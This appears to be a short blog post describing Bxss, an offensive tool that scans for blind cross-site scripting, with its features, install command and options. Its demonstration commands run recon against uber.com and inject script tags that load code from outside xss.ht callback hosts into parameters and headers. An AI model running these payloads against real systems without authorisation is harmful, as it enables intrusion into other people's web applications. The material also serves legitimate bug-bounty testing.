Offensive Security Tool: Bxss – Blind XSS Scanner

Reading Time: 2 Minutes
Bxss – Blind XSS Scanner
Bxss – Blind XSS Scanner, developed by ethicalhackingplayground, is a tool designed to detect blind Cross-Site Scripting (XSS) vulnerabilities in web applications by injecting custom payloads into headers and parameters. Unlike traditional XSS, blind XSS triggers in scenarios where the injected payload is stored and executed asynchronously, such as in admin panels, logging systems, or third-party integrations.
See Also: A Practical Guide to Hacking Techniques for finding Top Bugs.
The Bug Bounty Hunting Course
Features
- Inject Blind XSS payloads into custom headers
- Inject Blind XSS payloads into parameters
- Uses Different Request Methods (PUT,POST,GET,OPTIONS) all at once
- Tool Chaining
- Really fast
- Easy to setup
Install
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
See Also: Recon Tool: Argus
Arguments
Argument | Description | Default |
---|---|---|
-appendMode | Append the payload to the parameter | |
-concurrency int | Set the concurrency | 30 |
-header string | Set the custom header | “User-Agent” |
-headerFile string | Path to file containing headers to test | |
-parameters | Test the parameters for blind xss | |
-payload string | The blind XSS payload | |
-payloadFile string | Path to file containing payloads to test |
Demonstration
Blind XSS In Parameters
subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters
Blind XSS In X-Forwarded-For Header
subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"
Clone the repo from here: GitHub Link